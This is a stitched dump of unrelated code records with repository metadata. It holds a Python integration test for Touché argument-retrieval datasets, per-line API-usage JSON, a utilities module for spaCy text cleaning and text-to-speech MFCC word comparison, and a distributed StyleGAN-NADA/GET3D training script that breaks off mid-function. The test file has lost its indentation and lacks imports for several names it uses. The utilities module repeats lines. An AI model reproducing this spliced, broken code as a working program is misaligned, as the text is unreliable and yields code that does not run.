from ir_datasets.formats.touche import ToucheQualityQrel
from test.integration.base import DatasetIntegrationTest
class TestTouche(DatasetIntegrationTest):
# noinspection PyTypeChecker
def test_queries(self):
self._test_queries(
"argsme/2020-04-01/touche-2020-task-1",
count=49,
items={
0: ToucheQuery(
query_id="1",
title="Should teachers get tenure?",
description=compile("A user has heard that some countries do give teach.{159}teachers vs. university professors is of interest\."),
narrative=compile("Highly relevant arguments make a clear statement a.{181}the situation of teachers' financial independence\."),
),
48: ToucheQuery(
query_id="50",
title="Should everyone get a universal basic income?",
description=compile("Redistribution of wealth is a fundamental concept .{93}ver, a user wonders whether this truly would help\."),
narrative=compile("Highly relevant arguments take a clear stance towa.{134}mentioning universal basic income only in passing\."),
),
}
)
self._test_queries(
"argsme/1.0/touche-2020-task-1/uncorrected",
count=49,
items={
0: ToucheQuery(
query_id="1",
title="Should teachers get tenure?",
description=compile("A user has heard that some countries do give teach.{159}teachers vs. university professors is of interest\."),
narrative=compile("Highly relevant arguments make a clear statement a.{181}the situation of teachers' financial independence\."),
),
48: ToucheQuery(
query_id="50",
title="Should everyone get a universal basic income?",
description=compile("Redistribution of wealth is a fundamental concept .{93}ver, a user wonders whether this truly would help\."),
narrative=compile("Highly relevant arguments take a clear stance towa.{134}mentioning universal basic income only in passing\."),
),
}
)
self._test_queries(
"argsme/2020-04-01/touche-2020-task-1/uncorrected",
count=49,
items={
0: ToucheQuery(
query_id="1",
title="Should teachers get tenure?",
description=compile("A user has heard that some countries do give teach.{159}teachers vs. university professors is of interest\."),
narrative=compile("Highly relevant arguments make a clear statement a.{181}the situation of teachers' financial independence\."),
),
48: ToucheQuery(
query_id="50",
title="Should everyone get a universal basic income?",
description=compile("Redistribution of wealth is a fundamental concept .{93}ver, a user wonders whether this truly would help\."),
narrative=compile("Highly relevant arguments take a clear stance towa.{134}mentioning universal basic income only in passing\."),
),
}
)
self._test_queries(
"clueweb12/touche-2020-task-2",
count=50,
items={
0: ToucheQuery(
query_id="1",
title="What is the difference between sex and love?",
description=compile("A potentially younger user has heard people talk a.{147}ontrast, what characterizes a loving relationship\."),
narrative=compile("Relevant documents will contain some description o.{155}f what people are looking for in either direction\."),
),
49: ToucheQuery(
query_id="50",
title="Whose salary is higher: basketball or soccer players?",
description=compile("A young married couple raises a 14-year old boy wh.{313}income to players in different parts of the world\."),
narrative=compile("Highly relevant documents provide information on a.{496}iptions of basketball and soccer are not relevant\."),
),
}
)
self._test_queries(
"argsme/2020-04-01/touche-2021-task-1",
count=50,
items={
0: ToucheTitleQuery(
query_id="51",
title="Do we need sex education in schools?"
),
49: ToucheTitleQuery(
query_id="100",
title="Do we need cash?"
),
}
)
self._test_queries(
"clueweb12/touche-2021-task-2",
count=50,
items={
0: ToucheQuery(
query_id="51",
title="What is better at reducing fever in children, Ibuprofen or Aspirin?",
description=compile("Younger parents have their 8-year old child sick\. .{400}en and aspirin for reducing the fever in children\."),
narrative=compile("Relevant documents will describe ibuprofen, aspiri.{258} or ingredients of the medicines are not relevant\."),
),
49: ToucheQuery(
query_id="100",
title="Should I learn Python or R for data analysis?",
description=compile("Wondering whether you should use Python or R for d.{318}ore useful, flexible, easy to learn and efficient\."),
narrative=compile("Relevant documents should compare two programming .{430}re not related to data analysis, are not relevant\."),
),
}
)
def test_qrels(self):
self._test_qrels(
"argsme/2020-04-01/touche-2020-task-1",
count=2298,
items={
0: TrecQrel(
query_id="1",
doc_id="S197beaca-A971412e6",
relevance=0,
iteration="0"
),
2297: TrecQrel(
query_id="50",
doc_id="Sffdf2e2e-A307df259",
relevance=2,
iteration="0"
),
}
)
self._test_qrels(
"argsme/1.0/touche-2020-task-1/uncorrected",
count=2964,
items={
0: TrecQrel(
query_id="1",
doc_id="197beaca-2019-04-18T11:28:59Z-00001-000",
relevance=4,
iteration="0"
),
2963: TrecQrel(
query_id="50",
doc_id="799d051-2019-04-18T11:47:02Z-00000-000",
relevance=-2,
iteration="Q0"
),
}
)
self._test_qrels(
"argsme/2020-04-01/touche-2020-task-1/uncorrected",
count=2298,
items={
0: TrecQrel(
query_id="1",
doc_id="S21dc5a14-A8b896cb0",
relevance=4,
iteration="0"
),
2297: TrecQrel(
query_id="50",
doc_id="Sffdf2e2e-A307df259",
relevance=2,
iteration="0"
),
}
)
self._test_qrels(
"clueweb12/touche-2020-task-2",
count=1783,
items={
0: TrecQrel(
query_id="1",
doc_id="clueweb12-0001wb-05-12311",
relevance=0,
iteration="0"
),
1782: TrecQrel(
query_id="50",
doc_id="clueweb12-0206wb-00-16297",
relevance=0,
iteration="0"
),
}
)
self._test_qrels(
"argsme/2020-04-01/touche-2021-task-1",
count=3711,
items={
0: ToucheQualityQrel(
query_id="94",
doc_id="S522c7c3b-A8a87130b",
relevance=2,
quality=2,
iteration="0"
),
3710: ToucheQualityQrel(
query_id="91",
doc_id="Sf0770da-A760eca8e",
relevance=0,
quality=1,
iteration="0"
),
}
)
self._test_qrels(
"clueweb12/touche-2021-task-2",
count=2076,
items={
0: ToucheQualityQrel(
query_id="54",
doc_id="clueweb12-0205wb-64-11095",
relevance=0,
quality=0,
iteration="0"
),
2075: ToucheQualityQrel(
query_id="86",
doc_id="clueweb12-0008wb-85-29079",
relevance=0,
quality=0,
iteration="0"
),
}
)
if __name__ == "__main__":
main()
|
Heyjuke58/ir_datasets
|
test/integration/touche.py
|
touche.py
|
py
| 9,700 |
python
|
en
|
code
| null |
github-code
|
6
|
[
{
"api_name": "test.integration.base.DatasetIntegrationTest",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheTitleQuery",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheTitleQuery",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 107,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.ToucheQuery",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.TrecQrel",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "ir_datasets.formats.touche.ToucheQualityQrel",
"line_number": 222,
"usage_type": "call"
},
{
"api_name": "unittest.main",
"line_number": 234,
"usage_type": "call"
}
] |
9272119407
|
import os
import numpy as np
import spacy
import re
import json
import pyttsx3 #replace it to librosa
import os
import librosa
import numpy as np
from fastdtw import fastdtw
from gtts import gTTS
from scipy.spatial.distance import euclidean
from fastdtw import fastdtw
import shutil
import config
def create_folder_if_not_exists(folder_path):
if not os.path.exists(folder_path):
os.makedirs(folder_path)
def move_files(source_filepath, destination_directory): #note that one is filepath and other is directory
shutil.move(source_filepath, destination_directory)
# Optional: Check if the file was moved successfully
if os.path.exists(source_filepath):
print("File move failed.")
def return_each_files_path(subfolder_path, return_type='full path'):
if return_type == 'full path':
for root, _, files in os.walk(subfolder_path):
for file in files:
yield os.path.join(root, file)
elif return_type == 'filename':
for root, _, files in os.walk(subfolder_path):
for file in files:
yield file
# Usage example:
# subfolder_path = '/path/to/your/subfolder'
# for path in return_each_files_path(subfolder_path):
# print(path)
def extract_data_from_json(file_path):
try:
with open(file_path, "r") as file:
data = json.load(file)
return data
except FileNotFoundError:
print(f"File '{file_path}' not found.")
except json.JSONDecodeError as e:
print(f"Error decoding JSON: {e}")
except ValueError as e:
print(e,"file not found")
except Exception as e:
print(f"An error occurred: {e}")
def filter_entities(doc, label):
filtered_entities = [ent.text for ent in doc.ents if ent.label_ == label]
return filtered_entities
def save_as_json(data, file_name, subdirectory):
"""
Save a dictionary or list as a JSON file in a subdirectory.
If a file with the same name exists, append the data to it.
Args:
- data: The dictionary or list to be saved.
- file_name: The name of the JSON file (without the .json extension).
- subdirectory: The name of the subdirectory where the JSON file will be saved.
Returns:
- The full path to the saved JSON file if successful, or None if there was an error.
"""
try:
# Create the subdirectory if it doesn't exist
if not os.path.exists(subdirectory):
os.makedirs(subdirectory)
# Construct the full file path
file_path = os.path.join(subdirectory, f"{file_name}.json")
# Initialize existing_data as an empty list if the file doesn't exist
existing_data = []
# If the file already exists, load its contents
if os.path.exists(file_path):
with open(file_path, 'r') as existing_file:
existing_data = json.load(existing_file)
# If data is a dictionary, append it as is; if it's a list, extend the list
if isinstance(data, dict):
existing_data.update(data)
elif isinstance(data, list):
existing_data.extend(data)
# Write the combined data to the JSON file
with open(file_path, 'w') as json_file:
json.dump(existing_data, json_file, indent=4)
print(f"Data saved or appended to {file_path}")
return file_path # Return the saved file path
except Exception as e:
print(f"An error occurred in saving json: {str(e)}")
print(f"An error occurred in saving json: {str(e)}")
return None
# # Example usage^:
# data_to_append = {"city": "Los Angeles", "zipcode": "90001"}
# subdirectory_name = "data_folder"
# # Save or append the data to a JSON file in the subdirectory and get the saved path
# saved_path = save_as_json(data_to_append, "person_data", subdirectory_name)
# if saved_path:
# print(f"Data saved or appended at: {saved_path}")
# else:
# print("Failed to save or append data.")
class TextProcessor:
def __init__(self, chunksize = 50000):
self.chunksize = chunksize
self.nlp = spacy.load("en_core_web_lg",disable=["tagger", "parser", "textcat"])
def read_file(self):
with open(self.file_path, "r",errors='ignore') as file:
file_contents = file.read()
return file_contents
def clean_text(self, text):
cleaned_text = re.sub(r'\n', '. ', text)
#cleaned_text = re.sub(r'[^\n]', '. ', text)
cleaned_text = re.sub(r'[&]', ' and ', cleaned_text)
cleaned_text = re.sub(r'[^a-zA-Z.();,?\'\"]', ' ', cleaned_text)
cleaned_text = re.sub(r'\n', '. ', text)
#cleaned_text = re.sub(r'[^\n]', '. ', text)
cleaned_text = re.sub(r'[&]', ' and ', cleaned_text)
cleaned_text = re.sub(r'[^a-zA-Z.();,?\'\"]', ' ', cleaned_text)
return cleaned_text
def tokenize_text(self, text):
doc = self.nlp(text)
return doc
def process_file(self,file_path):
self.file_path= file_path
file_contents = self.read_file()
cleaned_text = self.clean_text(file_contents)
splitted_text = cleaned_text[:50000]
#return self.tokenize_text(splitted_text)
self.chunksize = 50000
# # Split the document into chunks of 50,000 characters or less
# print("splitting book into chunks..")
# book_chunks = [cleaned_text[i:i + self.chunksize] for i in range(0, len(cleaned_text), self.chunksize)]
# print("tokenising each chunks..")
# doc_of_each_chunk=[self.tokenize_text(each_chunk) for each_chunk in book_chunks]
# return doc_of_each_chunk
for i in range(0, len(cleaned_text), self.chunksize):
text_chunk = cleaned_text[i:i + self.chunksize]
yield text_chunk
class AudioConverter():
def __init__(self, word, engine, save_directory= config.paths["save_directory"]):
word = word.lower()
file_path = save_directory+os.sep+ f"{word}{config.audio_format}"
self.file_path = file_path
self.word = word
self.engine = engine
def process(self):
if self.engine == "gtts":
try: #consider this as an additional filter for collected names
tts = gTTS(self.word)
tts.save(self.file_path)
except Exception as e:
print(f"unable to save '{self.word}' due to : {str(e)}")
elif self.engine == "pyttsx3":#note that this have to be deleted lately because the storage is high(ten times larger than gtts, but quicker and offline)
file_name = f"{self.word}{config.audio_format}"
engine = pyttsx3.init()
engine.save_to_file(self.word, self.file_path)
engine.runAndWait()
print("sended file path= ", self.file_path)
return self.file_path
class WordsComparer():
def __init__(self, audio1_path='',audio2_path='') -> None:
#print("audio path= ", audio1_path)
self.audio1_path = audio1_path
self.audio2_path= audio2_path
#self.file_name = f"{self.word}.wav"
# def convert_to_audio(self, word, engine):
# if engine == "gtts":
# file_path = os.path.join('data_christian','audio_data','doc_audio_data',f"{word}.wav")
# try: #consider this as an additional filter for collected names
# tts = gTTS(word)
# tts.save(file_path)
# except Exception as e:
# print(f"unable to save '{word}' due to : {str(e)}")
# elif engine == "pyttsx3":#note that this have to be deleted lately because the storage is high(ten times larger than gtts, but quicker and offline)
# file_name = f"{word}.wav"
# engine = pyttsx3.init()
# engine.save_to_file(word, file_name)
# engine.runAndWait()
# return file_path
def audio_to_mfcc(self, audio_file_path):
# Load the audio files #r"data\audio_data\sample_audio_data\output_audio1.wav"
audio, sr_doc = librosa.load(audio_file_path, sr= 24000)
# Extract MFCC features
mfcc_doc = librosa.feature.mfcc(y= audio, sr= sr_doc)
# Transpose MFCCs for compatibility with DTW
mfcc_doc = mfcc_doc.T
return mfcc_doc
def compare_two_MFCC(self,mfcc1,mfcc2): #get more information about this
def calculate_distance(mfcc1,mfcc2):
if mfcc1.shape[1] != mfcc2.shape[1]:
raise ValueError("Number of features (columns) must be the same for both sequences")
# Calculate the DTW distance using the fastdtw function
distance, _ = fastdtw(mfcc1, mfcc2)
# Calculate DTW distance and path
#print("mfcc1 shape= ",mfcc1.shape[1],"distance= ",distance)
#print(distance)
return distance
distance = calculate_distance(mfcc1,mfcc2)
#print(distance)
# Normalize the distance (optional)
normalised_distance = distance / min(len(mfcc1) , len(mfcc2))
normalised_distance = round(normalised_distance,2)
return normalised_distance
# def word_to_mfcc(self, word):
# audio_converter = AudioConverter(word,'gtts')
# file_path = audio_converter.process()
# mfcc_file = self.audio_to_mfcc(file_path)
# #os.remove(file_name)
# return mfcc_file
def process(self):
mfcc1 = self.audio_to_mfcc(self.audio1_path)
mfcc2 = self.audio_to_mfcc(self.audio2_path)
# mfcc1= self.word_to_mfcc(self.word)
# mfcc2= self.word_to_mfcc(self.word2)
distance= self.compare_two_MFCC(mfcc1=mfcc1, mfcc2=mfcc2)
return distance
if __name__ == "__main__":
file_path1 = AudioConverter(word='k',engine='gtts').process()
file_path2 = AudioConverter(word='vanakkam',engine='gtts').process()
distance = WordsComparer(file_path1,file_path2).process()
print(distance,file_path2)
|
RamSankarTheDeveloper/TeenyTinyTitleTrove
|
utils.py
|
utils.py
|
py
| 10,032 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.path.exists",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "shutil.move",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "json.JSONDecodeError",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 79,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 89,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "spacy.load",
"line_number": 125,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 133,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 139,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "config.paths",
"line_number": 168,
"usage_type": "attribute"
},
{
"api_name": "os.sep",
"line_number": 170,
"usage_type": "attribute"
},
{
"api_name": "config.audio_format",
"line_number": 170,
"usage_type": "attribute"
},
{
"api_name": "gtts.gTTS",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "config.audio_format",
"line_number": 184,
"usage_type": "attribute"
},
{
"api_name": "pyttsx3.init",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "librosa.load",
"line_number": 221,
"usage_type": "call"
},
{
"api_name": "librosa.feature.mfcc",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "librosa.feature",
"line_number": 224,
"usage_type": "attribute"
},
{
"api_name": "fastdtw.fastdtw",
"line_number": 236,
"usage_type": "call"
}
] |
16898559994
|
#!/usr/bin/env python3
import itertools
def print_header(x, y, z = None):
print("join_digits(", seq2digit(x), ", ", seq2some(y), ", ", seq2digit(z), ") ->", sep="")
def produce(seq):
while seq:
if len(seq) == 4:
yield seq2node(seq[:2])
yield seq2node(seq[2:])
break
yield seq2node(seq[:3])
seq = seq[3:]
def print_body(seq):
print(" ", seq2some(produce(seq)), ";", sep="")
def seq2digit(seq):
return "{{{}}}".format(", ".join(itertools.chain("_", seq)))
def seq2some(seq):
return "{{{}}}".format(", ".join(seq))
def seq2node(seq):
return "node({})".format(", ".join(seq))
print("-spec join_digits(digit(X), some(X), digit(X)) -> some(node(X)) when X :: desc().")
var_x = 'ABCD'
var_some = 'EFGH'
var_z = 'IJKL'
MAX = 12
MAXONE = 4
for size_some in range(0, MAXONE + 1):
for size_x in range(1, MAXONE + 1):
for size_z in range(1, MAXONE + 1):
x, some, z = var_x[:size_x], var_some[:size_some], var_z[:size_z]
print_header(x, some, z)
print_body(x + some + z)
print("join_digits(Left, Some, Right) -> error(function_clause, [Left, Some, Right]).")
|
platbox/nanometer
|
py/ftree_generate.py
|
ftree_generate.py
|
py
| 1,194 |
python
|
en
|
code
| 3 |
github-code
|
6
|
[
{
"api_name": "itertools.chain",
"line_number": 24,
"usage_type": "call"
}
] |
30814462620
|
"""
Script Description
- train NADA model
Usage
- $ python train_nada.py --config_path [config_path] --name [exp_name] --suppress
- $ cat [config_path] | python train_nada.py --pipe --name [exp_name] --suppress
Author
- Minsu Kim
- Dongha Kim
History
- 230419 : MINSU , init
- adaptation loop
- code skeleton
- 230422 : MINSU , implement
- code corresponding to GET3D application 4.3.2
- 230422 : DONGHA , convert as distributed script
Reference
- StyleGAN-NADA Github
https://github.com/rinongal/StyleGAN-nada/blob/main/ZSSGAN/train.py
"""
import sys
import os
import time
import tempfile
import yaml
import numpy as np
import torch
from torchvision.utils import save_image
import logging
import dist_util
from model_engine import find_get3d
from nada import YAIverseGAN
from functional import unfreeze_generator_layers, generate_custom
if find_get3d():
from torch_utils import custom_ops
_SEED = 0
_SELECT = 50
def get_logger(exp_name, outdir, rank=0):
logger = logging.getLogger(exp_name)
if rank != 0:
logger.disabled = True
else:
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
file_handler = logging.FileHandler(f'{outdir}/{exp_name}_{time.strftime("%Y-%m-%d-%H-%M", time.gmtime())}.log')
file_handler.setFormatter(formatter)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
return logger
def subprocess_fn(rank, config, args, temp_dir):
if config['GLOBAL']['gpus'] > 1:
dist_util.setup_dist(temp_dir, rank, config['GLOBAL']['gpus'])
if rank != 0:
custom_ops.verbosity = 'none'
if rank == 0:
print("START ! EXP NAME : ", args.name)
print("SETTING : LOAD YaiverseGAN")
with dist_util.synchronized_ops():
net = YAIverseGAN(config)
unfreeze_generator_layers(net.generator_trainable, [], [])
if dist_util.get_world_size() > 1:
ddp_net = torch.nn.parallel.DistributedDataParallel(
net,
device_ids=[dist_util.dev()],
output_device=dist_util.dev(),
broadcast_buffers=True,
bucket_cap_mb=256,
find_unused_parameters=True,
)
else:
ddp_net = net
device, outdir, batch, n_vis, sample_1st, sample_2nd, iter_1st, iter_2nd, lr, \
output_interval, save_interval, gradient_clip_threshold = net.get_loop_settings()
g_optim = torch.optim.Adam(
net.generator_trainable.parameters(),
lr=lr,
betas=(0.9, 0.99),
)
with dist_util.synchronized_ops():
if rank == 0:
sample_dir = os.path.join(outdir, "sample")
ckpt_dir = os.path.join(outdir, "checkpoint")
os.makedirs(outdir, exist_ok=True)
os.makedirs(sample_dir, exist_ok=True)
os.makedirs(ckpt_dir, exist_ok=True)
torch.manual_seed(_SEED)
np.random.seed(_SEED)
logger = get_logger(args.name, outdir, rank=rank)
logger.info(f'EXP NAME : {args.name} | CONFIG : {args.config_path} | SEED : {_SEED} | BATCH : {batch}')
z_dim = 512 # Fixed value
fixed_z_geo = torch.randn(n_vis, z_dim, device=device) # for eval
fixed_z_tex = torch.randn(n_vis, z_dim, device=device)
grid_rows = int(n_vis ** 0.5)
eval_camera = net.generator_frozen.synthesis.generate_rotate_camera_list(n_batch=1)[4].repeat(n_vis, 1, 1, 1)
# ------------------ Training 1st --------------
# latent z should be 2 -> for geo , tex
# different n_batch latents per gpu <- equals: seeing n_batch * n_gpu latents
latent_generator = torch.Generator(device)
latent_generator.manual_seed(rank)
sample_z_geo = torch.randn(sample_1st, z_dim, device=device, generator=latent_generator)
sample_z_tex = torch.randn(sample_1st, z_dim, device=device, generator=latent_generator)
sample_z_geo_chunks = torch.split(sample_z_geo, batch, dim=0)
sample_z_tex_chunks = torch.split(sample_z_tex, batch, dim=0)
logger.info(f'START TRAINING LOOP')
min_loss_store = []
for epoch in range(iter_1st):
for i, (z_geo_chunk, z_tex_chunk) in enumerate(zip(sample_z_geo_chunks, sample_z_tex_chunks)):
# training
ddp_net.train()
# memory-efficient forward : support n_view rendering
_, loss = ddp_net(z_tex_chunk, z_geo_chunk)
if epoch == iter_1st - 1: # to choose 50 latents with low loss value
loss_val = loss.cpu().detach().numpy().tolist()
min_loss_store += loss_val
loss = loss.mean()
ddp_net.zero_grad()
loss.backward()
if gradient_clip_threshold == -1:
pass
else:
torch.nn.utils.clip_grad_norm_(net.generator_trainable.parameters(), gradient_clip_threshold)
g_optim.step()
logger.info(f'EPOCH : {epoch} | STEP : {i:0>4} | LOSS : {loss:.5f}')
# evaluation & save results | save checkpoints
with dist_util.synchronized_ops():
if rank == 0:
if i % output_interval == 0:
ddp_net.eval()
with torch.no_grad():
sampled_dst, _ = generate_custom(
net.generator_trainable,
fixed_z_tex, fixed_z_geo,
use_mapping=True, mode='layer', camera=eval_camera
)
rgb = sampled_dst[:, :-1]
mask = sampled_dst[:, -1:]
bg = torch.ones(rgb.shape, device=device)
bg *= 0.0001 # for better background
new_dst = rgb*mask + bg*(1-mask)
save_image(
new_dst,
os.path.join(sample_dir, f"Iter1st_Epoch-{epoch}_Step-{i:0>4}.png"),
nrow=grid_rows,
normalize=True,
range=(-1, 1),
)
logger.info(f'ITER 1st | EPOCH : {epoch} | STEP : {i:0>4} | >> Save images ...')
if i % save_interval == 0 and not args.suppress:
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/Iter1st_Epoch-{epoch}_Step-{i:0>4}.pt",
)
logger.info(f'ITER 1st | EPOCH : {epoch} | STEP : {i:0>4} | >> Save checkpoint ...')
torch.cuda.empty_cache() # added
dist_util.barrier()
logger.info(f"SELCT TOP {_SELECT} Latents")
# min_topk_val, min_topk_idx = torch.topk(torch.tensor(min_loss_store), _SELECT) #previous
min_topk_val, min_topk_idx = torch.topk(torch.tensor(min_loss_store), _SELECT, largest=False)
print("SELECT : ", min_topk_val, min_topk_idx)
# ------------------ Training 2nd --------------
selected_z_geo = sample_z_geo[min_topk_idx]
selected_z_tex = sample_z_tex[min_topk_idx]
selected_z_geo_chunks = torch.split(selected_z_geo, batch, dim=0)
selected_z_tex_chunks = torch.split(selected_z_tex, batch, dim=0)
min_loss = 1000
for epoch in range(iter_2nd):
for i, (z_geo_chunk, z_tex_chunk) in enumerate(zip(selected_z_geo_chunks, selected_z_tex_chunks)):
# training
ddp_net.train()
_, loss = ddp_net(z_tex_chunk, z_geo_chunk)
loss = loss.mean()
ddp_net.zero_grad()
loss.backward()
if gradient_clip_threshold == -1:
pass
else:
torch.nn.utils.clip_grad_norm_(net.generator_trainable.parameters(), gradient_clip_threshold)
logger.info(f'ITER 2nd | EPOCH : {epoch} | STEP : {i:0>4} | LOSS : {loss:.5f}')
# evaluation & save results | save checkpoints
with dist_util.synchronized_ops():
if rank == 0:
if (i == len(selected_z_geo_chunks) - 1) and (epoch == iter_2nd - 1):
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/latest.pt",
)
if i % output_interval == 0:
ddp_net.eval()
with torch.no_grad():
sampled_dst, _ = generate_custom(
net.generator_trainable,
fixed_z_tex, fixed_z_geo, use_mapping=True, mode='layer', camera=eval_camera
)
rgb = sampled_dst[:, :-1]
mask = sampled_dst[:, -1:]
bg = torch.ones(rgb.shape, device=device)
bg *= 0.0001 # for better background
new_dst = rgb*mask + bg*(1-mask)
save_image(
new_dst,
os.path.join(sample_dir, f"Iter2nd_Epoch-{epoch}_Step-{i:0>4}.png"),
nrow=grid_rows,
normalize=True,
range=(-1, 1),
)
logger.info(f'ITER 2nd | EPOCH : {epoch} | STEP : {i:0>4} | >> Save images ...')
if i % save_interval == 0:
if not args.suppress:
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/Iter2nd_Epoch-{epoch}_Step-{i:0>4}.pt",
)
logger.info(f'ITER 2nd | EPOCH : {epoch} | STEP : {i:0>4} | >> Save checkpoint ...')
if loss < min_loss:
min_loss = loss
torch.save(
{
"g_ema": net.generator_trainable.state_dict(),
"g_optim": g_optim.state_dict(),
},
f"{ckpt_dir}/best.pt",
)
torch.cuda.empty_cache()
dist_util.barrier()
logger.info("TRAINING DONE ...")
# Check final results
with dist_util.synchronized_ops():
if rank == 0:
net.eval()
with torch.no_grad():
last_z_geo = torch.randn(n_vis, z_dim, device=device)
last_z_tex = torch.randn(n_vis, z_dim, device=device)
sampled_dst, _ = generate_custom(
net.generator_trainable,
last_z_tex, last_z_geo, use_mapping=True, mode='layer', camera=eval_camera
)
save_image(
sampled_dst,
os.path.join(sample_dir, "params_latest_images.png"),
nrow=grid_rows,
normalize=True,
range=(-1, 1),
)
logger.info("FINISH !")
def launch_training(args): # Multiprocessing spawning function
# Load config and parse the number of GPUs.
if args.pipe:
config = yaml.safe_load(sys.stdin)
else:
with open(args.config_path, 'r') as f:
config = yaml.safe_load(f)
gpus = config['GLOBAL']['gpus']
# In case of single GPU, directly call the training function.
if gpus == 1:
subprocess_fn(0, config, args, None)
return
# Otherwise, launch processes.
print('Launching processes...')
